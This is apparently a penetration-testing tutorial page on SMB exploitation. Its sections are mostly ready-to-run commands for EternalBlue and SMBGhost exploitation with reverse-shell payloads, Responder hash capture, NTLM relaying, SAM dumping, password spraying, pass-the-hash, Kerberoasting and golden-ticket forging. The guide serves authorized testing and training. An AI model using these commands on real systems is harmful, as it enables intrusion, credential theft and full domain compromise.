Phase 3: Active Exploitation

SMB Exploitation

Advanced SMB/CIFS exploitation techniques for penetration testing. Learn to safely exploit vulnerabilities and gain unauthorized access to target systems.

Remote Code Execution

Exploit critical vulnerabilities like EternalBlue and SMBGhost

Credential Attacks

Brute force, relay attacks, and hash-based authentication

Share Exploitation

Leverage misconfigured shares for unauthorized access

Critical Exploits

EternalBlue Exploitation (MS17-010)

Remote code execution vulnerability in SMBv1 that allows complete system compromise

Vulnerability Verification

# Verify EternalBlue vulnerability
nmap --script smb-vuln-ms17-010 -p445 <target_ip>

# Alternative verification with Metasploit
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS <target_ip>
run

Always verify the vulnerability exists before attempting exploitation. This prevents unnecessary noise and failed exploitation attempts.

Metasploit Exploitation

# Launch Metasploit console
msfconsole

# Use EternalBlue exploit module
use exploit/windows/smb/ms17_010_eternalblue

# Configure target and payload
set RHOSTS <target_ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444

# Execute the exploit
exploit

Successful exploitation provides a Meterpreter session with SYSTEM privileges on the target system.

Manual Exploitation with Python

# Clone EternalBlue exploit
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010

# Generate shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=4444 -f raw > sc_x64.bin

# Execute exploit
python eternalblue_exploit7.py <target_ip> sc_x64.bin

Manual exploitation provides more control over the payload and exploitation process.

CVE-2020-0796

SMBGhost Exploitation

SMBv3 compression vulnerability affecting Windows 10 and Server 2019

Vulnerability Detection

# Check for SMBGhost vulnerability
nmap --script smb-vuln-cve-2020-0796 -p445 <target_ip>

# Alternative detection script
python3 cve-2020-0796-scanner.py <target_ip>

Exploitation Process

# Clone SMBGhost exploit
git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git
cd SMBGhost_RCE_PoC

# Compile the exploit
gcc -o exploit exploit.c

# Execute against target
./exploit <target_ip>

SMBGhost exploitation is more complex and may require custom shellcode development for reliable execution.

SMB Relay Attacks

Exploit SMB authentication mechanisms to gain unauthorized access to other systems

LLMNR/NBT-NS Poisoning

# Start Responder to capture hashes
responder -I eth0 -rdwv

# Alternative with specific protocols
responder -I eth0 -rdwv -f

# Analyze captured hashes
cat /usr/share/responder/logs/*.txt

Responder captures NetNTLM hashes when systems attempt to resolve non-existent hostnames.

SMB Relay with ntlmrelayx

# Create target list
echo "192.168.1.100" > targets.txt
echo "192.168.1.101" >> targets.txt

# Start SMB relay attack
ntlmrelayx.py -tf targets.txt -smb2support

# Relay with command execution
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

# Relay to dump SAM database
ntlmrelayx.py -tf targets.txt -smb2support --sam

SMB relay attacks forward captured authentication to other systems where SMB signing is not required.

Credential-Based Attacks

Brute force attacks, password spraying, and hash-based authentication

Password Attacks with CrackMapExec

# Single target brute force
crackmapexec smb <target_ip> -u users.txt -p passwords.txt

# Password spraying across multiple targets
crackmapexec smb targets.txt -u admin -p Password123

# Test common credentials
crackmapexec smb <target_ip> -u administrator -p admin
crackmapexec smb <target_ip> -u guest -p ""

Use wordlists and common credentials to identify weak authentication configurations.

Pass-the-Hash Attacks

# Pass-the-hash with CrackMapExec
crackmapexec smb <target_ip> -u username -H <ntlm_hash>

# Pass-the-hash across multiple targets
crackmapexec smb targets.txt -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76

# Execute commands with hash
crackmapexec smb <target_ip> -u username -H <hash> -x "whoami"

Pass-the-hash attacks use captured NTLM hashes for authentication without knowing the plaintext password.

Share Access and Enumeration

# Access shares with valid credentials
smbclient //<target_ip>/C$ -U username

# Map all accessible shares
crackmapexec smb <target_ip> -u username -p password --shares

# Recursive share enumeration
smbmap -H <target_ip> -u username -p password -R

# Download sensitive files
smbget -R smb://<target_ip>/share/ -U username

Once credentials are obtained, enumerate and access available shares to gather sensitive information.

Advanced Exploitation Techniques

Sophisticated attack methods for complex environments

Kerberoasting

# Request service tickets for cracking
GetUserSPNs.py domain/username:password -dc-ip <dc_ip> -request

# Crack service tickets offline
hashcat -m 13100 tickets.txt wordlist.txt

# Alternative with Rubeus (Windows)
Rubeus.exe kerberoast /outfile:tickets.txt

Kerberoasting targets service accounts with weak passwords by requesting and cracking service tickets.

Golden Ticket Attacks

# Create golden ticket with mimikatz
kerberos::golden /user:administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:<hash> /ptt

# Alternative with Impacket
ticketer.py -nthash <krbtgt_hash> -domain-sid <domain_sid> -domain domain.com administrator

# Use ticket for access
export KRB5CCNAME=administrator.ccache
smbclient //dc.domain.com/C$ -k

Golden tickets provide persistent domain access by forging Kerberos tickets with the KRBTGT hash.

Essential Tools

Metasploit

Framework with SMB exploitation modules

Framework

CrackMapExec

SMB credential attacks and lateral movement

Credential Attack

Impacket

Python SMB implementation and tools

Python Tools

Responder

LLMNR/NBT-NS poisoning and hash capture

Network Attack

ntlmrelayx

SMB relay attack tool

Relay Attack

Next Steps

Post-Exploitation

Learn persistence, privilege escalation, and lateral movement techniques

CVE Database

Research specific exploits and their technical details

Additional Resources

MITRE ATT&CK

Framework for understanding adversary tactics

OWASP Testing Guide

Comprehensive security testing methodology

Tenable Solutions

Professional vulnerability management

SMB Penetration Testing Learning Path

Comprehensive SMB security assessment methodology from reconnaissance to post-exploitation

Beginner

SMB Protocol Fundamentals

Master SMB/CIFS protocol architecture, versions, and security mechanisms

SMB protocol security testing

CIFS security assessment

Learn More

Intermediate

SMB Reconnaissance & Enumeration

Learn SMB enumeration techniques, null session testing, and share discovery

SMB enumeration techniques

SMB null session enumeration

Learn More

Intermediate

SMB Vulnerability Analysis

Identify SMB security vulnerabilities and assess enterprise Windows security

SMB vulnerability scanning

SMB security assessment

Learn More

Advanced

SMB Exploitation Techniques

Master EternalBlue, SMBGhost, and advanced SMB attack methodologies

EternalBlue SMB exploit

SMBGhost vulnerability testing

Current Page

Advanced

SMB Post-Exploitation

Learn persistence, lateral movement, and privilege escalation in SMB environments

SMB lateral movement testing

Windows credential harvesting

Learn More

Reference

SMB CVE Database

Research critical SMB vulnerabilities and exploitation techniques

MS17-010 penetration testing

SMB remote code execution

Learn More